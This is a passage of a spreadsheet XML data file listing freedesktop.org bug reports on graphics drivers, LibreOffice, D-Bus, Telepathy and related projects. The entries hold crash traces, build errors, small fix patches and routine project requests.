 sw/qa/unoapi/knownissues.xcl
and run:
 cd smoketestoo_native &amp;&amp; build --all
 cd sw &amp;&amp; make -sr subsequentcheck</t>
  </si>
  <si>
    <t>DRI-90410</t>
  </si>
  <si>
    <t>[HSW/BDW/SKL HDMI] System boot up causes [drm:check_crtc_state [i915]] *ERROR* mismatch in ddi_pll_sel (expected 0x00000000 found 0x80000000)</t>
  </si>
  <si>
    <t>Created attachment 115708
dmesg info
System Environment:       
-----------------------------------------------------
Regression:  not sure
Non-working platforms: BDW-H
==Kernel==
--------------------------------------------------
commit 7dcedb8e7bbf49f1342df21851d9b36786ff67ce
Author: Daniel Vetter 
Date:   Mon May 11 18:51:58 2015 +0200
drm-intel-nightly: 2015y-05m-11d-16h-51m-26s UTC integration manifest==Bug detailed 
==description==
System boot up causes [drm:check_crtc_state [i915]] *ERROR* mismatch in ddi_pll_sel (expected 0x00000000 found 0x80000000) on BDW-H with the latest nightly kernel it also exists on drm-intel-testing-2015-05-08 it does not exists on latest fixes branch.
==Output==
[    8.663193] [drm:check_crtc_state [i915]] *ERROR* mismatch in ddi_pll_sel (expected 0x00000000 found 0x80000000)
[    8.663194] ------------[ cut here ]------------
[    8.663202] WARNING: CPU: 0 PID: 946 at drivers/gpu/drm/i915/intel_display.c:12074 check_crtc_state+0xb67/0xbd1 [i915]()
[    8.663203] pipe state doesn't match!
[    8.663223] Modules linked in: dm_mod iTCO_wdt iTCO_vendor_support ppdev snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi pcspkr i2c_i801 joydev lpc_ich snd_hda_intel mfd_core snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore battery parport_pc parport ac acpi_cpufreq i915 button video drm_kms_helper drm
[    8.663224] CPU: 0 PID: 946 Comm: kworker/0:1 Tainted: G        W       4.1.0-rc2_drm-intel-testing-2015-05-08+ #2
[    8.663225] Hardware name: Intel Corporation Broadwell Client platform/Basking Ridge BIOS BDW-E1R1.86C.0119.R01.1503252201 03/25/2015
[    8.663227] Workqueue: events console_callback
[    8.663228]  0000000000000000 0000000000000009 ffffffff817a66cc ffff88044bfc3778
[    8.663229]  ffffffff8103ebde ffff88044bfc3770 ffffffffa00ca3b0 ffff880446e00000
[    8.663230]  ffff880446c9f000 ffff8804472a4800 ffff88044bfc3800 ffff880445e48400
[    8.663231] Call Trace:
[    8.663232]  [] ? dump_stack+0x40/0x50
[    8.663233]  [] ? warn_slowpath_common+0x98/0xb0
[    8.663241]  [] ? check_crtc_state+0xb67/0xbd1 [i915]
[    8.663242]  [] ? warn_slowpath_fmt+0x45/0x4a
[    8.663249]  [] ? check_crtc_state+0xb67/0xbd1 [i915]
[    8.663260]  [] ? intel_modeset_check_state+0x610/0x9e9 [i915]
[    8.663268]  [] ? intel_crtc_set_config+0x3f8/0x531 [i915]
[    8.663272]  [] ? drm_modeset_lock_all_crtcs+0x69/0x81 [drm]
[    8.663278]  [] ? drm_mode_set_config_internal+0x4e/0xd2 [drm]
[    8.663280]  [] ? drm_fb_helper_pan_display+0x81/0xb6 [drm_kms_helper]
[    8.663283]  [] ? fb_pan_display+0xcb/0x10b
[    8.663284]  [] ? bit_update_start+0x16/0x32
[    8.663286]  [] ? fbcon_switch+0x421/0x438
[    8.663287]  [] ? redraw_screen+0x106/0x1db
[    8.663289]  [] ? complete_change_console+0x32/0xb6
[    8.663290]  [] ? console_callback+0x4b/0xed
[    8.663291]  [] ? process_one_work+0x1b2/0x31d
[    8.663292]  [] ? worker_thread+0x265/0x351
[    8.663294]  [] ? cancel_delayed_work_sync+0xa/0xa
[    8.663295]  [] ? kthread+0xce/0xd6
[    8.663296]  [] ? kthread_create_on_node+0x162/0x162
[    8.663298]  [] ? ret_from_fork+0x42/0x70
[    8.663300]  [] ? kthread_create_on_node+0x162/0x162
[    8.663301] ---[ end trace 3824646499370b63 ]---
Reproduce steps:
----------------------------
1 start machine</t>
  </si>
  <si>
    <t>XORG-17962</t>
  </si>
  <si>
    <t>Hardy live cd displays strange things with geforce 7900 &amp; acer AL1916W screen</t>
  </si>
  <si>
    <t>Created attachment 19467
Xorg.0.log
I'm forwarding this bug from a Ubuntu reporter:
https://bugs.edge.launchpad.net/ubuntu/+source/xserver-xorg-video-nv/+bug/196215
Screenshot:
http://launchpadlibrarian.net/12261714/bug.jpg
Problem:  Corrupt display on boot with the -nv driver on a GeForce 7900 GT since at least 2.1.8 and persists through 2.1.10.  Setting the HWCursor option changes the behavior but still leaves screen blanked.
Original Report:
I have nvidia geforce 7900 and an acer AL1916W widescreen monitor. Its native resolution is 1440*900.  I get strange colors all over my screen when I run Hardy Alpha 5 Live CD. See attached picture.  Ubuntu 7.04 Live (-nv 2.0.0) and before that doesn't even show anything on my screen my monitor says unsupported resolution.
However it works in safe mode (-vesa).
lspci:
(II) PCI: 05:00:0: chip 10de0291 card 10de0321 rev a1 class 030000 hdr 00
(--) PCI:*(5:0:0) nVidia Corporation G71 [GeForce 7900 GT/GTO] rev 161 Mem @ 0xfa000000/24 0xd0000000/28 0xfb000000/24 I/O @ 0x6c00/7
 nv_driver.c lists that it supports the card:
  { 0x10DE0291 GeForce 7900 GT }
Tested:
Feisty      (-nv 2.0.0):  Fails with unsupported resolution
Hardy-Beta  (-nv 2.1.8):  Fails showing issue
Hardy       (-nv 2.1.8):  Fails showing issue
Intrepid-a4 (-nv 2.1.10): Fails showing issue
Setting Option HWCursor false - Fails with unsupported resolution</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-3311</t>
  </si>
  <si>
    <t>german translation: Richt-Text instead of Rich-Text</t>
  </si>
  <si>
    <t>from [1]:
    Rich Text Format
    Zngin Mtn Format
    Rich Text Format
    Dogfen Testun Gyfoethog
    Richt-Text-Format
    RTF-asiakirja
    Rich Text Format
    RTF-fÃ¡jl
    Rich Text 
    Rijke Tekst Formaat
    Rik tekst-dokument
    Rik tekst-format
       (RTF)
    Rikt textdokument
Note that the German translation says Richt-Text instead of Rich-Text.
[1] http://bugzilla.gnome.org/show_bug.cgi?id=148440</t>
  </si>
  <si>
    <t>LIBREOFFICE-46338</t>
  </si>
  <si>
    <t>Substitution of missing references with #REF! makes correcting formulas impossible</t>
  </si>
  <si>
    <t>When a reference to a non-existing sheet is being entered into a formula or when a sheet is renamed/deleted LibreOffice substitutes the reference that pointed to that sheet with text #REF!. This makes correcting formulas difficult or even impossible since the old value is lost.
How to reproduce the bug:
Create a new spreadsheet and enter =SheetX.A1 into any cell. Calc will change the formula to =#REF!.A1 immediately!
Calc should display #REF! in the cell but the content of the cell should be untouched. Highlighting the reference that causes the error would be a helpful feature.</t>
  </si>
  <si>
    <t>PULSEAUDIO-73505</t>
  </si>
  <si>
    <t>[PATCH] Update Ukrainian  translation</t>
  </si>
  <si>
    <t>Created attachment 91870
A patch to update Ukrainian translation
Attached is the Ukrainian translation update (git-synced).
The translation is tested with msgfmt -vc</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-5074</t>
  </si>
  <si>
    <t>Request for hosting chemical-mime-data at fd.o</t>
  </si>
  <si>
    <t>Hello
I want to ask if you could host my project chemical-mime-data. This project was
founded by Egon Willighagen and me and hosted for a while on sourceforge.net as
part of the Chemistry Development Kit. At the moment you can find the complete
work at http://cvs.wgdd.de/cgi-bin/cvsweb/chemical-mime-data/.
The project is aimed to provide a set of definitions to enable support for
chemical MIME types on (hopefully) all Linux desktops like KDE GNOME ROX ...
The data is mainly taken from Henry Rzepa's http://www.ch.ic.ac.uk/chemime/ list.
I started a discussion some time ago. You can see the results at
http://lists.freedesktop.org/archives/xdg/2005-May/006858.html. Everything else
can be found at the developers mailing lists of the Chemistry Development Kit.
Please tell me if you have more questions or any concerns.
PS: I don't have a CVS account for fd.o atm. Please tell me if I first need to
ask for CVS access.</t>
  </si>
  <si>
    <t>daniel.leidert.spam</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-48249</t>
  </si>
  <si>
    <t>Change project owner for spice</t>
  </si>
  <si>
    <t>We'd like to change the project owner for spice from me (alexl@redhat.com) to Alon Levy (alevy@redhat.com).
Also is it possible to have two project owners to spread the load?</t>
  </si>
  <si>
    <t>LIBREOFFICE-32795</t>
  </si>
  <si>
    <t>text alignment of multiple lines in cells is ignored at exactly 90 degrees</t>
  </si>
  <si>
    <t>Created attachment 41585
examples of (mis)aligned cells
OOO330m18 (Build:4) tag libreoffice-3.3.0.2
Spreadsheet application:
Precondition: An arbitrary cell shall contain 2 lines of text.
Alignment is left bottom 0 degrees.
Line heigth should be longer than text length.
Execute: change cell format 1 alignment and change angle to 90.
Expected: text is rotated 90 degrees counter clockwise beginning at the bottom of the cell.
Actually the text seems to be left-end-aligned with the beginning governed by the longer of the two lines.
Workaround: if the angle is 89 or 91 degrees or if the cell contains only one line of text the behaviour is as exected.
With different preconditions : Alignment left top 0 degrees
the text seems to disappear at 90 degrees.</t>
  </si>
  <si>
    <t>peter.widow</t>
  </si>
  <si>
    <t>WAYLAND-94218</t>
  </si>
  <si>
    <t>Weston 1.10 crashes when dropping a dragâ€™nâ€™drop in Firefox 47.0a1 on Xwayland 1.18.1</t>
  </si>
  <si>
    <t>Steps to reproduce:
- Start Firefox
- Select some text or find an image
- Drag this text/image
- When the left button is released Weston crashes.
Iâ€™m pretty sure this didnâ€™t happen on 1.9 but itâ€™s been a long time since I last used it Iâ€™ll try to debug it later.</t>
  </si>
  <si>
    <t>LIBREOFFICE-42227</t>
  </si>
  <si>
    <t>FILEOPEN: rotated objects all in top left slide corner</t>
  </si>
  <si>
    <t>Take a Draw document.
Enter a drawing object in the middle of the page for example a rectangle or a textbox.
Rotate the object for example 30Â°.
Save the document.
Reload the document.
Notice the rotated object has its corner at position 0|0.
I see this bug in a self-compiled LibO3.5 on WinXP. So please try it with an actual build to verify that it is nothing special for my build. My build is made from 5ad4d151dac1eb887d92200330e31af269d8d1fd</t>
  </si>
  <si>
    <t>MESA-104819</t>
  </si>
  <si>
    <t>[libdrm build failure on 32 bit Ubuntu 16.04] libdrm_macros.h:79:4: error: size of unnamed array is negative</t>
  </si>
  <si>
    <t>One of latest libdrm commits make libdrm fails to build on 32 bit Ubuntu 16.06. Builds fine on 64 bit and newer Ubuntus. Error:
make[4]: Entering directory '/&gt;/libdrm-2.4.89+git1801270630.6f0f6c~oibaf~x/build/tests/amdgpu'
../../../tests/amdgpu/basic_tests.c: In function â€˜amdgpu_userptr_testâ€™:
../../../tests/amdgpu/basic_tests.c:1397:2: warning: ignoring return value of â€˜posix_memalignâ€™ declared with attribute warn_unused_result [-Wunused-result]
  posix_memalign(
  ^
In file included from ../../../amdgpu/amdgpu_internal.h:35:0
                 from ../../../tests/amdgpu/vm_tests.c:28:
../../../libdrm_macros.h: In function â€˜drm_munmapâ€™:
../../../libdrm_macros.h:79:4: error: size of unnamed array is negative
    STATIC_ASSERT(LARGE_OFF_T % 2147483629 == 721 &amp;&amp;
    ^
Makefile:616: recipe for target 'amdgpu_test-vm_tests.o' failed
make[4]: *** [amdgpu_test-vm_tests.o] Error 1
make[4]: Leaving directory '/&gt;/libdrm-2.4.89+git1801270630.6f0f6c~oibaf~x/build/tests/amdgpu'
Full build log including configure flags:
https://launchpadlibrarian.net/354844704/buildlog_ubuntu-xenial-i386.libdrm_2.4.89+git1801270630.6f0f6c~oibaf~x_BUILDING.txt.gz</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-98224</t>
  </si>
  <si>
    <t>Modify my blog's RSS feed in planet.freedesktop.org</t>
  </si>
  <si>
    <t>I would like to change my RSS feed URL from:
http://blog.samuelig.es/category/freedesktop-org/feed/
to:
https://blogs.igalia.com/siglesias/feed.freedesktop.xml
Thanks!
Sam</t>
  </si>
  <si>
    <t>LIBREOFFICE-79099</t>
  </si>
  <si>
    <t>Different names for the same field in Spanish UI</t>
  </si>
  <si>
    <t>Created attachment 99605
file with some dummy text and images of the UI
Problem description:For the spanish UI in writer the file properties it has the subject as Asunto and in the Insert/Fields appears as Tema they are synonimus but as the english versiÃ³n of the fieds it use the same name subject in the properties and subject in the insert feld. 
Steps to reproduce:
1. No steps to reproduceI have attached a document with images of the UI
Current behavior:
difference names for the same field in properties and insert field.
Expected behavior:
It should be the same name so the user can use the word Tema in a personalized field in properties.
Operating System: Windows 8
Version: 4.3.0.0.beta1
Last worked in: 4.1.2.3 release</t>
  </si>
  <si>
    <t>riggracia</t>
  </si>
  <si>
    <t>LIBREOFFICE-44947</t>
  </si>
  <si>
    <t>New strings in Color dialog not localizable</t>
  </si>
  <si>
    <t>Created attachment 55800
Strings not localized
Danish language pack.
In the color dialog the strings Embed Load Color List and Save Color List are in English. I cant find these strings in Pootle.
Running 3.5.0 Beta3 on x86 deb Linux.</t>
  </si>
  <si>
    <t>LIBREOFFICE-66675</t>
  </si>
  <si>
    <t>Prompt to save dialog box is resizeable</t>
  </si>
  <si>
    <t>Created attachment 82152
Screenshot of incorrect behavior
... and it should not. You can make it very big and create a bunch of empty space.
The screenshot was made under Windows but in Linux/Metacity is worse as it has a Maximize button.
(related to Widget Layout conversion).
Operating System: All
Version: 4.1.0.1 rc
Last worked in: 4.0.4.2 release</t>
  </si>
  <si>
    <t>DRI-57937</t>
  </si>
  <si>
    <t>[SNB+] clflush before pageflip causes jitter</t>
  </si>
  <si>
    <t>Created attachment 71071
Patch that fixes the choppyness.
Description
===========
In version 2.20.10 and later I noticed that some graphics operations were not
as smooth as they were in 2.20.9.  It isn't all that severe but it was enough
to annoy me and eventually make me track down the source.
System environment
==================
* chipset: i915
* system arch: 64-bit
* xf86-video-intel: 2.20.10 has the issue above patch fixes it.
* xserver: 1.13.0
* mesa: 9.0
* libdrm: 2.4.40
* kernel: 3.5.6
* distribution: Arch linux
* Machine: Lenovo X220T
* Display connector: HDMI
How to reproduce it
===================
I use compiz as a stand-alone window manager and when using the expo
feature to zoom out and see all desktops the graphics are noticeably choppy.
Other operations (the scale plugin and even sliding to another desktop) are
similarly choppy but the expo feature makes me notice it the most.
How to fix(?) it
================
The source is commit 45b351412b.  If you revert that commit things are nice
and smooth again.  I applied the following patch to the master branch of git
(as of 12/6/2012 commit is 0040eb84c9187):
--- a/src/sna/kgem.c
+++ b/src/sna/kgem.c
@@ -14377 +14377 @@ static void kgem_bo_clear_scanout(struct kgem *kgem struct kgem_bo *bo)
 	bo-&gt;reusable = true
 	if (kgem-&gt;has_llc &amp;&amp;
-	    !gem_set_cacheing(kgem-&gt;fd bo-&gt;handle SNOOPED))
+	    gem_set_cacheing(kgem-&gt;fd bo-&gt;handle SNOOPED))
 		bo-&gt;reusable = false
 }
And the problem was resolved.  I know *nothing* about the driver and have no
idea why this helps but it does.  I used the following configure flags:
./configure --prefix=/usr --enable-dri \
	CFLAGS=-march=native -O3 -pipe --param=ssp-buffer-size=4 \
	LDFLAGS=-Wl-O1--sort-common--as-needed-zrelro
But I note that the same behavior is there with -O2.</t>
  </si>
  <si>
    <t>wes_zilla</t>
  </si>
  <si>
    <t>POPPLER-17674</t>
  </si>
  <si>
    <t>Mismatched free() / delete in HtmlOutputDev.cc</t>
  </si>
  <si>
    <t>The text property in the HtmlString class is allocated with grealloc() and should therefore be freed with gfree() instead of delete in the HtmlString destructor.
diff --git a/utils/HtmlOutputDev.cc b/utils/HtmlOutputDev.cc
index 54f62e7..df4b6bf 100644
--- a/utils/HtmlOutputDev.cc
+++ b/utils/HtmlOutputDev.cc
@@ -1427 +1427 @@ HtmlString::HtmlString(GfxState *state double fontSize HtmlFontAccu* fonts) {
 HtmlString::~HtmlString() {
-  delete text
+  gfree(text)
   delete htext
   gfree(xRight)
 }</t>
  </si>
  <si>
    <t>LIBREOFFICE-72650</t>
  </si>
  <si>
    <t>Startup is slow due to the new startcenter if opened before a remote file</t>
  </si>
  <si>
    <t>Hi
If you connected to an ftp site LO next startup is really slow.
Steps to reproduce :
- Open a file on a ftp
- Close LO
- Open LO again
- Wait :-)
Expected behavior :
- Not to wait :-)
For records: backtrace during the startup http://pastebin.com/7c0Qfbz3</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-78031</t>
  </si>
  <si>
    <t>fixed URL in docs</t>
  </si>
  <si>
    <t>Created attachment 98124
The URLs mentioned in README.enhancing were outdated
The URLs mentioned in README.enhancing were outdated.</t>
  </si>
  <si>
    <t>kontakt</t>
  </si>
  <si>
    <t>GEOCLUE-76268</t>
  </si>
  <si>
    <t>InUse is set even if geolocation is disabled</t>
  </si>
  <si>
    <t>Currently we report that geolocation is in use simply because the number of connected clients is non-zero. This means that gnome-shell displays a crosshair even if geolocation is disabled:
https://bugzilla.gnome.org/show_bug.cgi?id=726497
'InUse' should only be set if the number of authorized connected clients is non-zero.</t>
  </si>
  <si>
    <t>TELEPATHY-21152</t>
  </si>
  <si>
    <t>MUC: don't disco the chatroom</t>
  </si>
  <si>
    <t>At the moment we don't let the user join a MUC until we've discoed it and found out whether it is in fact a MUC. This isn't actually guaranteed to work (in particular Google MUC servers don't respond to our disco request).
We should:
* remove the check
* check that when you try to join a contact as if they were a MUC nothing explodes too badly</t>
  </si>
  <si>
    <t>XORG-7321</t>
  </si>
  <si>
    <t>Dual Head and Xinerama does not work on Asus M2N laptops</t>
  </si>
  <si>
    <t>Having read dozens of forums and bug reports on this topic I have to say that
Xinerama still does not work. It did work until X.org 6.8.x but there hasn't
been any known case of Xinerama working on an Asus M2N under X.org 7.0 or newer.
The patches addressing this issue are said to be ready and included in the
mainstream. However the problem persists.
My machine: Asus M2N
My distro: ArchLinux
Two important lines from lspci:
00:02.0 VGA compatible controller: Intel Corporation 82852/855GM Integrated
Graphics Device (rev 02)
00:02.1 Display controller: Intel Corporation 82852/855GM Integrated Graphics
Device (rev 02)
I used Xinerama with X.org 6.8.x. There have some minor problems with software
suspend an OpenGL but everything worked quite well in general. Since 6.9.x the
X-server refuses to start with a dual head layout despite all of the following:
* Modules and extensions loaded or not
* Xinerama turned on or off
* Various options turned on or off in the Device sections
* The X-server being installed from the distro packages or compiled on my own
An unsuccessful attempt blocks the chipset completely and a reboot is required
to start the X-server again even in single head mode.
All the important files are included below.</t>
  </si>
  <si>
    <t>aa</t>
  </si>
  <si>
    <t>XORG-7418</t>
  </si>
  <si>
    <t>Fix up pt_BR.UTF-8 compose</t>
  </si>
  <si>
    <t>We've been shipping this patch in Debian for some time now.
Rewrite pt_BR.UTF-8/Compose to include en_US.UTF-8/Compose so that
this file can be easily maintained.  Replace + to match
the definition from iso8859-1/Compose.  Thanks Rafael Ãvila de EspÃ­ndola
(closes: #296599)
This patch by Denis Barbier.</t>
  </si>
  <si>
    <t>TELEPATHY-32691</t>
  </si>
  <si>
    <t>Support addressing in TpBaseProtocol</t>
  </si>
  <si>
    <t>Make Protocol.Interface.Addressing easily supportable in CMs</t>
  </si>
  <si>
    <t>PORTLAND-81674</t>
  </si>
  <si>
    <t>xdg-open fails if your Window Manager is LXDE but you don't have pcmanfm</t>
  </si>
  <si>
    <t>The problem is that xdg-open assumes that you have pcmanfm if you use LXDE. So if you don't have pcmanfm it just fails and opens nothing. Instead it should fallback to the generic method.</t>
  </si>
  <si>
    <t>astrothayne</t>
  </si>
  <si>
    <t>freedesktop_bugzilla</t>
  </si>
  <si>
    <t>HAL-11736</t>
  </si>
  <si>
    <t>Add support for Trekstor Vibez as USB MP3 Player</t>
  </si>
  <si>
    <t>Freedesktop currently doesn't recognize TrekStor Vibez as an MP3 player. It would be nice to support companies like TrekStor who have made an effort to make their products Linux friendly.</t>
  </si>
  <si>
    <t>aden.list</t>
  </si>
  <si>
    <t>LIBREOFFICE-55660</t>
  </si>
  <si>
    <t>WIKIHELP  tag is parsed instead of taken literally</t>
  </si>
  <si>
    <t>http://help.libreoffice.org/swriter/cui%3ACheckBox%3ARID_OFAPAGE_HTMLOPT%3ACB_PRINT_EXTENSION?Language=en-US&amp;System=WIN&amp;Version=3.6#bm_id2938932
== Font sizes ==
Use the spin buttons '''Size 1''' to '''Size 7''' to define the respective font sizes for the HTML  to  tags.
Rendering is corrupted beyond that point.</t>
  </si>
  <si>
    <t>XORG-8920</t>
  </si>
  <si>
    <t>xf86OSKbd.h missing from xf86-input-keyboard-1.2.0</t>
  </si>
  <si>
    <t>The 1.2.0 version of the keyboard input driver tries to #include xf86OSKbd.h
but the file does not exist in xf86-input-keyboard-1.2.0/src.
This prevents the new driver from compiling.
The file is not in the tarball found at
http://xorg.freedesktop.org/releases/individual/driver/xf86-input-keyboard-1.2.0.tar.bz2.
 It is in the git repository.
It looks like the 1.2.0 package was rolled up before the appropriate change was
committed in git.</t>
  </si>
  <si>
    <t>scottfk</t>
  </si>
  <si>
    <t>RARIAN-13201</t>
  </si>
  <si>
    <t>rarian: missing expression on return statement</t>
  </si>
  <si>
    <t>From [1]:
I just tried to compile package rarian-0.6.0-8
The compiler said
rarian-reg-utils.c:819: warning: 'return' with no value in function returning
non-void
The source code is
                return
Usually I'd suggest add expression to return statement but for
this code I'd suggest changing the return type of the function
to void.
[1] https://bugzilla.novell.com/show_bug.cgi?id=340620</t>
  </si>
  <si>
    <t>mauropm</t>
  </si>
  <si>
    <t>PIGLIT-94620</t>
  </si>
  <si>
    <t>find_package called with invalid argument CONFIG</t>
  </si>
  <si>
    <t xml:space="preserve">piglit: e28a6528f0265db43143b16518a14fc9e46063d9 (master)
CMake Error at CMakeLists.txt:219 (find_package):
  find_package called with invalid argument CONFIG
$ cmake --version
cmake version 2.8.7
Error is introduced with this commit.
commit 1b5fb027a0f7fcc84f58f18e06c8661fde17a34d
Author: Dylan Baker 
Date:   Wed Feb 10 16:29:47 2016 -0800
    CMake: install bash completions
    This uses the bash-completion cmake file provided by bash-completions to
    install the file to the system (if one does a system install). Otherwise
    one can just copy the file to somewhere it will get sourced by their
    bashrc.
    Signed-off-by: Dylan Baker </t>
  </si>
  <si>
    <t>UIM-5638</t>
  </si>
  <si>
    <t>helper: dict</t>
  </si>
  <si>
    <t>A hard-coded library in the dict-anthy.c</t>
  </si>
  <si>
    <t>At least for me uim-dict-gtk is working with anthy-7100b
(libanthydic.so.1.0).  Could you apply a patch uploaded later?</t>
  </si>
  <si>
    <t>DBUS-65712</t>
  </si>
  <si>
    <t>[PATCH] Fix Werror=unused-function if build without X11</t>
  </si>
  <si>
    <t>If build DBus without X11 it will fail like below.
dbus-launch.c:112:1: error: â€˜read_machine_uuid_if_neededâ€™ defined but not used [-Werror=unused-function]
cc1: all warnings being treated as errors
make[2]: *** [dbus-launch.o] Error 1
make[2]: Leaving directory `/home/chengwei/Upstream/dbus.git/tools'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/chengwei/Upstream/dbus.git'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>XORG-16522</t>
  </si>
  <si>
    <t>Add configure option to set NOFONTSERVERACCESS (patch included)</t>
  </si>
  <si>
    <t>Created attachment 17378
Add configure option --disable-fc which disables font server support
In libXfont-1.3.1 there is the configure option --disable-fc which disables the code to connect to a font server. In xorg-server-1.4.2 in confdefs.h there is the #define NOFONTSERVERACCESS but the only way to set it is by passing --enable-builtin-fonts to configure.
I think it can be useful to compile an X server which only supports client-side fonts but does not have them built into the server itself. Therefore I would like to have a configure option to set the NOFONTSERVERACCESS #define.
I attached a patch that adds the --disable-fc configure option which sets NOFONTSERVERACCESS. It required adding one #ifndef in dix/dixfonts.c all other changes are in configure.ac.
The existing --enable-builtin-fonts option implies --disable-fc. This is handled by giving the fc option the default value auto which acts as enabled. If --enable-builtin-fonts is given a warning is printed and fc is forcibly disabled.
An alternative would be to silently disable fc if it was in auto mode and raise an error if it was in enabled mode (explicitly enabled by the user). I usually prefer programs to refuse invalid inputs instead of automatically correcting them. However I looked for similar situations in configure.ac and saw that for example --disable-dga is handled by printing a warning and forced disabling so I conformed to that.</t>
  </si>
  <si>
    <t>XORG-11032</t>
  </si>
  <si>
    <t>xrandr mode setting breaks</t>
  </si>
  <si>
    <t>On my laptop (Lenovo 3000 N100) with: (using 00:02.0)
00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS 943/940GML Express Integrated Graphics Controller (rev 03)
00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS 943/940GML Express Integrated Graphics Controller (rev 03)
the driver comes up with the native LCD resolution (1280x800) without video bios hacking but it seems to have problems with using xrandr to change to other resolutions. xrandr reports:
 SZ:    Pixels          Physical       Refresh
*0   1280 x 800    ( 433mm x 433mm )  *60  
 1   1024 x 768    ( 433mm x 433mm )   60  
 2    800 x 600    ( 433mm x 433mm )   60  
 3    640 x 480    ( 433mm x 433mm )   60  
 4   1280 x 1280   ( 433mm x 433mm )   60  
and xrandr -s 3 (or one of any number of games that set this resolution) causes the screen to change to that resolution but show vertical lines of various colors and stop doing any further video. The system seems to continue running but switching to other consoles doesn't work. Sometimes the X cursor appears in the upper right corner but doesn't respond to the touchpad. I'm probably going to switch back to &lt;2.0 for now but I can collect further information if it would help debug.</t>
  </si>
  <si>
    <t>PACKAGEKIT-27594</t>
  </si>
  <si>
    <t>misspelling -- investiagtion should be investigation</t>
  </si>
  <si>
    <t>Created attachment 34902
fix misspelling
I was updating my Ubuntu beta and noticed a misspelling today. I have attached a git diff patch.
I marked this bug as major since I think it kinda makes PackageKit look unpolished and is easily fixed.
Just so the devs know PackageKit (and KPackageKit) is really working well for me. Keep up the good work!</t>
  </si>
  <si>
    <t>wt</t>
  </si>
  <si>
    <t>MESA-26795</t>
  </si>
  <si>
    <t>[softpipe] piglit glsl-arb-fragment-coord-conventions fails</t>
  </si>
  <si>
    <t>Created attachment 33634
glsl-arb-fragment-coord-conventions.png
mesa: 909c08d177638a6318382a70eee6e05ed67efd81 (master)
$ ./bin/glsl-arb-fragment-coord-conventions
Probe at (00)
  Expected: 0.000000 0.000000 0.000000
  Observed: 0.003922 0.015686 0.003922</t>
  </si>
  <si>
    <t>DBUS-51580</t>
  </si>
  <si>
    <t>import dbus fails on MSWindows (x86) python 2.7</t>
  </si>
  <si>
    <t>import dbus returns the following traceback
&gt;&gt;&gt; import dbus
Traceback (most recent call last):
  File  line 1 in 
  File dbus\__init__.py line 82 in 
    import dbus.types as types
  File dbus\types.py line 6 in 
    from _dbus_bindings import (
ImportError: DLL load failed: %1 is not a valid Win32 application.
steps to reproduce:
1. install python-2.7.3 using windows installer
2. install pygtk-2.24 using windows all-in-one installer
3. download build &amp; install dbus-1.6 dbus-python dbus-glib
mingw32 on windows xp-sp3 (x86)
Python 2.7.3 - win32
GTK 2.0 - win32
PyGTK 2.24 - win32
dbus_glib 0.100 - compiled with mingw32
dbus-python 1.1.1 - compiled with mingw32
dbus 1.6.0 - mingw32
using sh.exe in msys
./configure PYTHON=/c/Python27/python \
PYTHON_INCLUDES=-I/c/Python27/include/ \
PYTHON_LIBS=-L/c/Python27/libs -lpython27.lib \
PKG_CONFIG=C:\Python27\Lib\site-packages\gtk-2.0\runtime\bin\pkg-config.exe \
PKG_CONFIG_PATH=/usr/local/bin:/usr/local/include/dbus-1.0/dbus:/usr/local/lib:/usr/local/lib/dbus-1.0/include/dbus:/usr/local/lib/pkgconfig
* there's also libpython27.a 
* also dbus 1.6.2 compiles very nicely with msvc and cmake but I haven't tried it yet with dbus-python
* the pkg-config.exe is from the gtk-2.0 win32 build from their all in one windows installer it all comes in pyGTK 2.24
* I tried LDFLAGS=\$(PYTHON_LIBS) -no-undefined -shrext .pyd but configure said that no-undefined and shext were unknown</t>
  </si>
  <si>
    <t>bwanamarko</t>
  </si>
  <si>
    <t>XORG-96536</t>
  </si>
  <si>
    <t>XServer Crashes on UnmapWindow with PointerGrab and Touch</t>
  </si>
  <si>
    <t>gerhard.m.jhoss</t>
  </si>
  <si>
    <t>TELEPATHY-40264</t>
  </si>
  <si>
    <t>Link mission control plugins agaisnt gio</t>
  </si>
  <si>
    <t>Created attachment 50420
Link against gio
mission-control-plugins/dispatch-operation-policy.c uses GSimpleAsyncResult but doesn't link against gio.</t>
  </si>
  <si>
    <t>XORG-12124</t>
  </si>
  <si>
    <t>Fix from bug 4686 for Xv corruption needed in Nouveau</t>
  </si>
  <si>
    <t>Current git version of Nouveau DDX has video corruption when the video is larger than the screen res. This can be triggered by playing Elephants Dream in HD in mplayer or taking some smaller movie and using -vf scale=something:big.
The issue has only been observed when using YV12 output and the overlay (as is the default) - use of the blitter port or using -vf yuy2 does not display the problem. Applying the two line fix from bug 4686 used in nv to Nouveau results in correct playback.
Hardware is a NV31M [GeForce FX Go5600] (10d3:031a) in a laptop.</t>
  </si>
  <si>
    <t>XPRINT-811</t>
  </si>
  <si>
    <t>Documentation: Manual pages (manpages)</t>
  </si>
  <si>
    <t>Xprt.sgml / Xprt.man seems to be missing in Xorg trunk</t>
  </si>
  <si>
    <t>[reported via email]
It seems that Xprt.sgml and the documents generated from it (Xprt.man
Xprt.html) are currently missing in Xorg trunk.</t>
  </si>
  <si>
    <t>MEDIA-PLAYER-INFO-30792</t>
  </si>
  <si>
    <t>Cleanup Sandisk media players</t>
  </si>
  <si>
    <t>Remove MTP USB Ids
Split devices to have correct names
Add new devices
(see attached patch)</t>
  </si>
  <si>
    <t>XORG-18688</t>
  </si>
  <si>
    <t>xf86-video-s3 not working</t>
  </si>
  <si>
    <t>I have this card plugged in:
-------
00:05.0 VGA compatible controller: S3 Inc. 86c764/765 [Trio32/64/64V+] (rev 54) (prog-if 00 [VGA controller])
	Flags: medium devsel IRQ 11
	Memory at dc000000 (32-bit non-prefetchable) [size=64M]
	Expansion ROM at dbff0000 [disabled] [size=64K]
	Kernel modules: s3fb
or as lspci -vn lists it:
00:05.0 0300: 5333:8811 (rev 54) (prog-if 00 [VGA controller])
	Flags: medium devsel IRQ 11
	Memory at dc000000 (32-bit non-prefetchable) [size=64M]
